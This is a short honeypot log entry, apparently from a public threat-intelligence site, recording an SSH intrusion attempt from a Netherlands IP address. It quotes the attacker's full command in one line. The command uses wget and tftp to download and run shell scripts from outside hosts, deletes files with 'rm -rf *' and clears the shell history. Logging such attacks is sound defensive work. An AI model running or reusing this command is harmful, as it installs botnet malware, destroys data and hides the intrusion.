Time | 2023/05/17, 10:32:12 (GMT) |
Transaction ID | 1M5U5JL32RCB28SU |
Service | ssh |
Location | NL (Netherlands) |
Attacker | 45.128.232.62 |
Classification | Web script execution |
Harm Potential | High |
45.128.232.62 client username 'fake' and password 'fake' entered 45.128.232.62 client command : 'cd /tmp || cd /run || cd /; wget http://45.128.232.62/Nekobins.sh; chmod 777 Nekobins.sh; sh Nekobins.sh; tftp 107.189.12.79 -c get Nekotftp1.sh; chmod 777 Nekotftp1.sh; sh Nekotftp1.sh; tftp -r Nekotftp2.sh -g 107.189.12.79; chmod 777 Nekotftp2.sh; sh Nekotftp2.sh; rm -rf Nekobins.sh Nekotftp1.sh Nekotftp2.sh; rm -rf *; history -c; rm -rf ~/.bash_history'
All observations are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |